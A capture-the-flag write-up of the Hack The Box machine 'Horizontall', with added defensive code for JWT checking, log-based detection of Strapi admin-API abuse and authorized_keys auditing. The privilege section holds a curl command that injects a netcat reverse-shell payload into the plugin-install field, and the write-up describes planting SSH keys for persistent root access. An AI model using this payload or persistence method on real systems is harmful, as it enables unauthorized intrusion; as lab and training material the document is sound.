HTB: Horizontall

Geranard
6 min read · Jan 23, 2022

Hello everyone, this is my second time writing a report about Hack The Box. I’m sorry for any mistakes I made. I finished the box on 23 January 2022.

Enumeration

First things first, I use nmap to scan all ports.

nmap -sC -sV -p- -O -T4 10.10.11.105

As we can see, there are 2 open ports with known services: port 22 for SSH and port 80 for HTTP.

Port 22 runs a secure shell that gives remote access to the Linux box, and port 80 serves HTTP and brings us to the web page.

Then I go to http://10.10.11.105/ on port 80 to check the site. It can’t connect at first, so I add 10.10.11.105 as horizontall.htb to /etc/hosts.

With a little inspecting of the source code (copy-pasted into a code editor), I find another link to http://api-prod.horizontall.htb/reviews.

Add that hostname to /etc/hosts as well and we’re good to go.

Here it is, the API endpoint of horizontall box.

So I start directory busting on http://api-prod.horizontall.htb/ with DirBuster and find several interesting paths: /reviews, /reviews/count, /users, /admin, /admin/init, /admin/plugins, /admin/runtime~main.d078dc17.js, /admin/layout, /robots.txt, and /admin/robots.txt.

dirbuster

url = http://api-prod.horizontall.htb/

payload = /usr/share/dirbusters/wordlists/directory-list-2.3-medium.txt

threads = 100

extension = php,txt

Checking one of them, /reviews returns reviews from users. I assume I have to be a user first to leave reviews, but I don’t know where I can make an account for myself.

Checking the other subdirectories, I find the landing page of the API framework used by the horizontall API endpoint: Strapi. Searching about Strapi gives me some information, including the use of JWT (JSON Web Token) for authentication in this API.
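As an added illustration (not code from the original post or from Strapi), here is what that JWT is and how the API side is expected to validate it: an HS256 token is three base64url segments (header, claims, HMAC), and a correct verifier pins the algorithm, recomputes the HMAC with the server secret and enforces the exp claim. The secret, the claims and the helper names below are constructed for the demo.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed secret for the demo; a real deployment keeps its JWT secret in server config.
DEMO_SECRET = b"constructed-demo-secret"


def _b64url_encode(raw: bytes) -> str:
    """base64url without padding, as JWT segments are written."""
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    """Restore the padding a JWT segment drops, then decode."""
    padding = "=" * (-len(text) % 4)
    return base64.urlsafe_b64decode(text + padding)


def mint_token(claims: dict, secret: bytes) -> str:
    """Build an HS256 JWT: base64url(header).base64url(claims).base64url(hmac)."""
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def verify_token(token: str, secret: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if algorithm, signature and expiry all check out, otherwise None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        claims = json.loads(_b64url_decode(payload_b64))
    except ValueError:  # wrong segment count, bad base64 or bad JSON (JSONDecodeError is a ValueError)
        return None
    # Pin the algorithm: a header claiming "none" or any other alg is rejected before the signature check.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        return None
    now = time.time() if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        return None
    return claims


if __name__ == "__main__":
    tok = mint_token({"id": 3, "isAdmin": True, "iat": 1000, "exp": 2000}, DEMO_SECRET)
    print(tok)
    print(verify_token(tok, DEMO_SECRET, now=1500))   # the claims dict
    print(verify_token(tok, DEMO_SECRET, now=2000))   # None: expired
```

The point for a reviewer of such an API is the order of checks: algorithm first, then a constant-time signature comparison, then expiry; a token whose claims are edited, whose header says "none", or which is signed under a different secret is rejected before its claims are trusted.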

Gaining Access

It seems I must log in as admin to access the API. So I try /admin/init from the dirbuster results, and it reveals the Strapi version in use.

A quick search about Strapi 3.0.0-beta.17.4 shows there is a vulnerability in this version, CVE-2019-18818 (password reset handling). It says I could change the admin password through the API endpoint /admin/auth/reset-password, and I found source code for this exploit written in Python. With a small edit to the Python file, I change the password from SuperStrongPassword1 to admin123.

After changing the password, I successfully log in to the admin account.

So, with a little more research, I find CVE-2019-19609, a plugin install exploit, and also find a script to launch it from here. Then I change it a little.

After that, I set up a listener with netcat and launch the code.

nc -nlvp 7890

It works. While enumerating the system, I find the user flag inside the /home/developer folder.

Done with the user flag. Time to find the root flag.
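From the defender's side, the two admin-API steps above (the reset-password call and the plugin install) leave a recognisable trail in the access log of whatever sits in front of the Strapi API. The following detector is an added example, not part of the writeup or of Strapi: it walks nginx-style "combined" log lines, flags a password reset that was accepted without a prior forgot-password request from the same client, and flags any plugin install through the admin API. The log format, the /admin/auth/forgot-password endpoint name and the sample lines (including the 10.10.14.x addresses) are assumptions constructed for the demo.

```python
import re
from typing import Iterable, List, Tuple

# nginx "combined" format is assumed for the reverse proxy in front of the API.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

RESET_PATH = "/admin/auth/reset-password"        # endpoint abused by CVE-2019-18818
FORGOT_PATH = "/admin/auth/forgot-password"      # assumed name of the step a legitimate reset goes through
PLUGIN_INSTALL_PATH = "/admin/plugins/install"   # endpoint abused by CVE-2019-19609

# Constructed sample log: one client walks the API normally, one performs the two abuses,
# and one performs a legitimate forgot-password -> reset-password sequence.
SAMPLE_LOG = """\
10.10.14.5 - - [23/Jan/2022:10:01:02 +0000] "GET /reviews HTTP/1.1" 200 812 "-" "Mozilla/5.0"
10.10.14.5 - - [23/Jan/2022:10:01:09 +0000] "GET /admin/init HTTP/1.1" 200 143 "-" "Mozilla/5.0"
10.10.16.27 - - [23/Jan/2022:10:02:31 +0000] "POST /admin/auth/reset-password HTTP/1.1" 200 388 "-" "python-requests/2.26.0"
10.10.16.27 - - [23/Jan/2022:10:03:12 +0000] "POST /admin/plugins/install HTTP/1.1" 200 21 "-" "curl/7.74.0"
10.10.14.9 - - [23/Jan/2022:11:15:00 +0000] "POST /admin/auth/forgot-password HTTP/1.1" 200 2 "-" "Mozilla/5.0"
10.10.14.9 - - [23/Jan/2022:11:16:30 +0000] "POST /admin/auth/reset-password HTTP/1.1" 200 388 "-" "Mozilla/5.0"
"""


def find_strapi_admin_abuse(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, path, reason) for each suspicious admin-API request, in log order."""
    findings = []
    asked_forgot = set()  # clients that went through the forgot-password step
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; a production parser would count these
        ip, method = m["ip"], m["method"]
        path, status = m["path"].split("?", 1)[0], int(m["status"])
        if method != "POST":
            continue
        if path == FORGOT_PATH:
            asked_forgot.add(ip)
        elif path == RESET_PATH and 200 <= status < 300 and ip not in asked_forgot:
            findings.append((ip, path, "password reset accepted without a prior forgot-password request"))
        elif path == PLUGIN_INSTALL_PATH:
            # Plugin installs are rare admin actions; review the request body for shell metacharacters.
            findings.append((ip, path, "plugin install through the admin API"))
    return findings


if __name__ == "__main__":
    for ip, path, reason in find_strapi_admin_abuse(SAMPLE_LOG.splitlines()):
        print(f"{ip} {path}: {reason}")
```

On the sample, only the 10.10.16.27 client is reported (once per abuse); the 10.10.14.9 reset is not, because its forgot-password request was seen first. Correlating the reset-password alert with a subsequent plugin install from the same address, followed by an outbound connection from the Node process, is the sequence a response team would look for.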

Privilege Elevation

To make things easier, I should stabilize my access to the machine. So I try to get SSH access by uploading a public key to the .ssh folder inside /home/developer.

First, I generate an SSH key pair using the RSA algorithm.

Then I export it to an environment variable.

And using curl, I send the public key I made to /home/developer/.ssh/authorized_keys.

But the problem is that I can’t access the authorized_keys file. From here I know that it doesn’t work.

So I try another method, a reverse shell with netcat, and it works. I found the reference in this cheatsheet.

curl -i -X "POST" -H "Authorization: Bearer {JWT}" -H "Content-type: application/json" --data '{"plugin": "documentation && $(rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.16.27 7890 > /tmp/f; cat < /dev/tcp/10.10.11.105/7890|sh)", "port": "1337"}' "http://api-prod.horizontall.htb:80/admin/plugins/install"

Now I have to enumerate the machine in order to elevate my privileges. I use linpeas to help me enumerate the whole machine.

Looking through the result one by one, I get the ports used by the box. Port 8000 and port 3306 were not in the nmap result. A quick search on these ports shows that port 8000 is commonly used as an alternate HTTP port and port 3306 is the SQL port.

That means I could access a website through port 8000. I think I can open it from my own browser, but it turns out it is only accessible from localhost.

Searching for how to port forward, I find this article. But I have to use an SSH public key, so I make .ssh and upload my public key through the shell.

Then I copy the public key to ~/.ssh/authorized_keys.

And I access port 8000 through the SSH session.

From here, we know that the server is running Laravel v8 with PHP v7.4.18.

Searching for an exploit, I find this exploit. But there is something wrong with the script, so I decide to use this script instead.

Nice, got the root flag. But I haven’t maintained root access to the server yet. So I check whether the .ssh folder already exists in /root.

It already exists and there is an authorized_keys file. What I want to do is echo the public key I made earlier in the Gaining Access section into that authorized_keys file.

It works when using cat. I try to log in using the private key I made, and it works.
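Both of the key uploads above (the developer one used for port forwarding and the root one used to keep access) rely on nothing more than a writable authorized_keys file, which is exactly what a defender should be checking. The following audit is an added example, not code from the writeup: it parses an authorized_keys file the way sshd reads it (optional options field, key type, base64 blob, comment), reports the OpenSSH-style SHA256 fingerprint of every key that is not on an allowlist, and reports .ssh or authorized_keys permissions that grant group or other access. The allowlist, the sample key blobs and the function names are constructed for the demo.

```python
import base64
import hashlib
import stat
from pathlib import Path
from typing import List, Set, Tuple


def fingerprint(key_b64: str) -> str:
    """OpenSSH SHA256 fingerprint of a base64 public-key blob (what `ssh-keygen -lf` prints after "SHA256:")."""
    digest = hashlib.sha256(base64.b64decode(key_b64)).digest()
    return base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> List[Tuple[str, str, str]]:
    """Return (key_type, key_b64, comment) per key line; a leading options field (from=, command=...) is skipped.
    Options containing spaces are not handled by this simple splitter."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        idx = 0 if fields[0].startswith(("ssh-", "ecdsa-", "sk-")) else 1
        if len(fields) < idx + 2:
            continue
        entries.append((fields[idx], fields[idx + 1], " ".join(fields[idx + 2:])))
    return entries


def audit_ssh_dir(home: Path, allowed_fingerprints: Set[str]) -> List[str]:
    """Return human-readable findings for <home>/.ssh: loose permissions and keys not on the allowlist."""
    findings = []
    ssh_dir = home / ".ssh"
    ak = ssh_dir / "authorized_keys"
    if not ssh_dir.is_dir():
        return findings
    mode = stat.S_IMODE(ssh_dir.stat().st_mode)
    if mode & 0o077:
        findings.append(f"{ssh_dir}: mode {mode:04o} grants group/other access (expect 0700)")
    if not ak.is_file():
        return findings
    mode = stat.S_IMODE(ak.stat().st_mode)
    if mode & 0o077:
        findings.append(f"{ak}: mode {mode:04o} grants group/other access (expect 0600)")
    for key_type, key_b64, comment in parse_authorized_keys(ak.read_text()):
        try:
            fp = fingerprint(key_b64)
        except ValueError:  # binascii.Error is a ValueError: the blob is not valid base64
            findings.append(f"{ak}: unparseable key blob ({comment or key_type})")
            continue
        if fp not in allowed_fingerprints:
            findings.append(f"{ak}: unknown {key_type} key SHA256:{fp} ({comment or 'no comment'})")
    return findings


if __name__ == "__main__":
    # Audit the current user's own ~/.ssh with an empty allowlist: every key present is listed.
    for finding in audit_ssh_dir(Path.home(), set()):
        print(finding)
```

Run it against /root and each home directory with the fingerprints of the keys that are supposed to be there; a key that appears with a comment like "kali@kali" or with no comment at all is the artefact the root-flag section above leaves behind. File-integrity monitoring on authorized_keys files gives the same signal in near real time.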

Thank you for reading my report, I hope this helps you or does some good :D Have a great day!


Geranard

Just a boy who is interested in cyber security with little knowledge about it. "A nudge would be great!" - me, every time.